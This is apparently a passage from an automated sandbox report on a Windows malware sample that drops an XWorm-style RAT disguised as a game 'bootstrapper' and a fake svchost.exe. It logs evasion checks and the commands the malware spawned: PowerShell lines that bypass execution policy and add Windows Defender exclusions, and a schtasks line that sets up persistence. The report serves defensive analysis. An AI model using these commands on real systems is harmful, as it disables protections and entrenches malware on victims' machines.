                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8368
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1151
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7146
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2404
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exe TID: 7336Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exe TID: 7680Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -599875s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -599766s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -599628s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -599500s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -599391s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -599281s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -599162s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -599047s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -598937s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -598828s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -598719s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -598610s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -598500s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -598390s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -598278s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -598150s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -598036s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -597802s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -597532s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -597404s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -597294s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -597187s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -597078s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -596969s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -596860s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -596735s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -596610s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -596485s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -596360s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -596235s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -596110s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -595985s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -595863s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -595735s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -595610s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -595485s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -595360s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -595235s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -594880s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -594750s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -594641s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -594516s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -594406s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -594297s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -594188s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -594063s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -593938s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -593813s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -593703s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -593594s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -593469s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612Thread sleep time: -593359s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep time: -4611686018427385s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep count: 8368 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376Thread sleep count: 1151 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316Thread sleep time: -4611686018427385s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1736Thread sleep count: 7146 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1736Thread sleep count: 2404 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1976Thread sleep time: -5534023222112862s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 4424Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 7756Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 8076Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\not rat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Roaming\not rat.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 599766Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 599628Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 599500Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 599391Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 599281Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 599162Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 599047Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 598937Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 598828Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 598719Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 598610Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 598500Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 598390Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 598278Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 598150Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 598036Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 597802Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 597532Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 597404Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 597294Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 597187Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 597078Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 596969Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 596860Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 596735Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 596610Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 596485Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 596360Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 596235Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 596110Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 595985Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 595863Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 595735Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 595610Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 595485Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 595360Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 595235Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 594880Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 594750Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 594641Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 594516Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 594406Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 594297Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 594188Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 594063Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 593938Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 593813Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 593703Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 593594Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 593469Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 593359Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                          Source: Amcache.hve.12.drBinary or memory string: VMware
                          Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
                          Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
                          Source: Amcache.hve.12.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                          Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
                          Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: svchost.exe, 0000000E.00000002.2614689488.0000029106CD3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2613777027.0000029106C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: not rat.exe, 00000002.00000002.2630548369.000000001BE60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: svchost.exe, 0000000E.00000002.2614257252.0000029106C8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: W#/VMWare
                          Source: Amcache.hve.12.drBinary or memory string: vmci.sys
                          Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
                          Source: svchost.exe.2.drBinary or memory string: vmware
                          Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.12.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1685399090.0000022EC9FAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
                          Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F7200 CheckRemoteDebuggerPresent,2_2_00007FFB4B0F7200
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Yara detected Powershell download and execute
                          Source: Yara matchFile source: Process Memory Space: BootstrapperV1.23_ModdedByHisako.exe PID: 7424, type: MEMORYSTR
                          Source: Yara matchFile source: \Device\ConDrv, type: DROPPED
                          Adds a directory exclusion to Windows Defender
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe'
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                          Bypasses PowerShell execution policy
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe'
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess created: C:\Users\user\AppData\Roaming\not rat.exe "C:\Users\user\AppData\Roaming\not rat.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess created: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe "C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'not rat.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"Jump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 7424 -ip 7424
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7424 -s 2180
                          Source: not rat.exe, 00000002.00000002.2621953796.0000000003112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                          Source: not rat.exe, 00000002.00000002.2621953796.0000000003112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: not rat.exe, 00000002.00000002.2621953796.0000000003112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2}
                          Source: not rat.exe, 00000002.00000002.2621953796.0000000003112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                          Source: not rat.exe, 00000002.00000002.2621953796.0000000003112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeQueries volume information: C:\Users\user\Desktop\sDKRz09zM7.exe VolumeInformationJump to behavior
